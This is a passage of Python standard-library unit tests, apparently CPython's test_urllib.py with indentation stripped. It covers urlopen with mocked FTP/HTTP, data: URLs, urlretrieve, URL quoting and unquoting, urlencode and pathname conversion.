urlopen('ftp://localhost/a/file/which/doesnot/exists.py')
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
@patch.object(urllib.request, 'MAXFTPCACHE', 0)
def test_ftp_cache_pruning(self):
self.fakeftp()
try:
urllib.request.ftpcache['test'] = urllib.request.ftpwrapper('user', 'pass', 'localhost', 21, [])
urlopen('ftp://localhost')
finally:
self.unfakeftp()
def test_userpass_inurl(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://user:pass@python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_userpass_inurl_w_spaces(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
userpass = "a b:c d"
url = "http://{}@python.org/".format(userpass)
fakehttp_wrapper = http.client.HTTPConnection
authorization = ("Authorization: Basic %s\r\n" %
b64encode(userpass.encode("ASCII")).decode("ASCII"))
fp = urlopen(url)
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8"))
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
# the spaces are quoted in URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_URLopener_deprecation(self):
with support.check_warnings(('',DeprecationWarning)):
urllib.request.URLopener()
@unittest.skipUnless(ssl, "ssl module required")
def test_cafile_and_context(self):
context = ssl.create_default_context()
with support.check_warnings(('', DeprecationWarning)):
with self.assertRaises(ValueError):
urllib.request.urlopen(
"https://localhost", cafile="/nonexistent/path", context=context
)
class urlopen_DataTests(unittest.TestCase):
"""Test urlopen() opening a data URL."""
def setUp(self):
# text containing URL special- and unicode-characters
self.text = "test data URLs :;,%=& \u00f6 \u00c4 "
# 2x1 pixel RGB PNG image with one black and one white pixel
self.image = (
b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00'
b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae'
b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00'
b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82')
self.text_url = (
"data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3"
"D%26%20%C3%B6%20%C3%84%20")
self.text_url_base64 = (
"data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs"
"sJT0mIPYgxCA%3D")
# base64 encoded data URL that contains ignorable spaces,
# such as "\n", " ", "%0A", and "%20".
self.image_url = (
"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n"
"QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 "
"vHgAAAABJRU5ErkJggg%3D%3D%0A%20")
self.text_url_resp = urllib.request.urlopen(self.text_url)
self.text_url_base64_resp = urllib.request.urlopen(
self.text_url_base64)
self.image_url_resp = urllib.request.urlopen(self.image_url)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.text_url_resp, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_info(self):
self.assertIsInstance(self.text_url_resp.info(), email.message.Message)
self.assertEqual(self.text_url_base64_resp.info().get_params(),
[('text/plain', ''), ('charset', 'ISO-8859-1')])
self.assertEqual(self.image_url_resp.info()['content-length'],
str(len(self.image)))
self.assertEqual(urllib.request.urlopen("data:,").info().get_params(),
[('text/plain', ''), ('charset', 'US-ASCII')])
def test_geturl(self):
self.assertEqual(self.text_url_resp.geturl(), self.text_url)
self.assertEqual(self.text_url_base64_resp.geturl(),
self.text_url_base64)
self.assertEqual(self.image_url_resp.geturl(), self.image_url)
def test_read_text(self):
self.assertEqual(self.text_url_resp.read().decode(
dict(self.text_url_resp.info().get_params())['charset']), self.text)
def test_read_text_base64(self):
self.assertEqual(self.text_url_base64_resp.read().decode(
dict(self.text_url_base64_resp.info().get_params())['charset']),
self.text)
def test_read_image(self):
self.assertEqual(self.image_url_resp.read(), self.image)
def test_missing_comma(self):
self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain')
def test_invalid_base64_data(self):
# missing padding character
self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=')
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to makes sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
try:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
filePath = os.path.abspath(filePath)
try:
filePath.encode("utf-8")
except UnicodeEncodeError:
raise unittest.SkipTest("filePath is not encodable to utf8")
return "file://%s" % urllib.request.pathname2url(filePath)
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertIsInstance(result[1], email.message.Message,
"did not get an email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = open(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(block_count, block_read_size, file_size, count_holder=[0]):
self.assertIsInstance(block_count, int)
self.assertIsInstance(block_read_size, int)
self.assertIsInstance(file_size, int)
self.assertEqual(block_count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][2], 5)
self.assertEqual(report[1][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][2], 8193)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[1][1], 8192)
self.assertEqual(report[2][1], 8192)
class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
pass
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/',
reporthook=_reporthook)
finally:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/')
finally:
self.unfakehttp()
class QuotingTests(unittest.TestCase):
r"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 3986 (Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-~"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed as bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are not allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same as above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append(r'<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.parse.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
result = urllib.parse.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test with bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test with safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should raise type error on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters in Latin-1 range, encoded by default in UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded by with None (default)
result = urllib.parse.quote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded by default in UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters in BMP, encoded with Latin-1, with replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, Latin-1, with xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test for quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test for quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string with unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input, with unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters in the Latin-1 range, encoded with UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with None (default)
result = urllib.parse.unquote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=None", urllib.parse.urlencode({"a": None}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True))
self.assertEqual("a=None&a=a",
urllib.parse.urlencode({"a": [None, "a"]}, True))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, True))
def test_urlencode_encoding(self):
# ASCII encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default is UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
# ASCII Encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Utf-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) as safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=True, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter in sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$")
self.assertEqual(expect, result)
# Test all above in latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
result = urllib.parse.urlencode(given, doseq=True, safe=":$",
encoding="latin-1")
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.request.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathnam2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
